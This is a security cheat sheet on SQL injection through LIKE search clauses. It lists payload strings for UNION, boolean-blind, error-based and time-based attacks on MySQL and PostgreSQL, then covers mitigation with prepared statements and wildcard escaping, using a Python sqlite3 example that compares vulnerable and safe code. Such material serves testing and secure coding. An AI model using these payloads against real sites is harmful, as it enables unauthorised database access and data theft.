🧠 SQLi Context - LIKE (wildcards)

Exploitations

SQLi - UNION-based

Break out of the string and append your query.

-- Universal Bypass (Works on Contains, Starts With, and Ends With)
test' UNION {SELECT_query}--

-- Logical Closures (Use if comments are filtered)
-- For "Contains" (LIKE '%{input}%'):
test' UNION {SELECT_query} AND '%'='

-- For "Starts With" (LIKE '{input}%'):
test' UNION {SELECT_query} AND '%'='

-- For "Ends With" (LIKE '%{input}'):
test' UNION {SELECT_query} AND ''='

SQLi - Boolean-based Blind

Append AND conditions to test True/False logic. The examples below use the universal comment bypass.
-- Syntax: [Valid Search]' AND ([Your Condition])--
 
-- Example: Check if the database version starts with 5
test' AND (SUBSTRING(@@version,1,1)='5')--

SQLi - Error-based

Force an error that leaks data directly to the web page.
-- Syntax: [Valid Search]' AND [Error Function]--
 
-- MySQL: XPATH Error
test' AND EXTRACTVALUE(1, CONCAT(0x7e, ({query})))--
 
-- PostgreSQL: Cast Error
test' AND CAST(({query}) AS INT)--

SQLi - Time-based Blind

Force a database sleep if a condition is met.

-- Syntax: [Valid Search]' AND [Sleep Function]--
 
-- MySQL: If user is admin, sleep 5 seconds
test' AND IF((SELECT user)='admin', SLEEP(5), 0)--
 
-- PostgreSQL:
test' AND (SELECT CASE WHEN ((SELECT current_user)='admin') THEN pg_sleep(5) ELSE pg_sleep(0) END)--

Mitigation

  • Fix: Use Prepared Statements so that user input can never close the string literal around the pattern. Prepared statements alone do not neutralise LIKE wildcards, because % and _ are interpreted by the pattern matcher rather than the SQL parser: if the application needs to treat user input as literal characters rather than wildcards, the user's % and _ characters (and the escape character itself) must be escaped (e.g., \%, \_) before being passed to the query, and the escape character must be declared with an ESCAPE clause or match the database's default.
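As an added example (not part of this cheat sheet), the vulnerable "Contains" search from above beside the mitigation just described, using Python's built-in sqlite3 on constructed sample data; the table and column names are assumptions.

```python
import sqlite3

ESC = "\\"  # escape character declared in the ESCAPE clause below


def escape_like(term: str) -> str:
    """Neutralise LIKE metacharacters so user input matches literally.

    The escape character itself is escaped first, then % and _.
    Parameter binding alone does not do this: the bound value is still
    parsed as a pattern by LIKE.
    """
    return (term.replace(ESC, ESC + ESC)
                .replace("%", ESC + "%")
                .replace("_", ESC + "_"))


def make_db() -> sqlite3.Connection:
    """Constructed sample data (in-memory SQLite) for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO products VALUES (?)",
                     [("test widget",), ("100% cotton",), ("my_item",)])
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", "s3cret"))
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list[str]:
    """The LIKE '%{input}%' pattern from the page, built by concatenation.

    A quote in `term` ends the pattern literal, so anything after it is
    parsed as SQL (the page's UNION and AND payloads all rely on this).
    """
    sql = f"SELECT name FROM products WHERE name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, term: str) -> list[str]:
    """Parameterised query plus wildcard escaping.

    The wildcards the application adds stay outside the bound value, and
    the ESCAPE clause tells the database which character escape_like() used.
    """
    sql = "SELECT name FROM products WHERE name LIKE ? ESCAPE '\\'"
    pattern = "%" + escape_like(term) + "%"
    return [row[0] for row in conn.execute(sql, (pattern,))]
```

Both functions return identical results for ordinary input; they differ only when the input carries a quote or a wildcard.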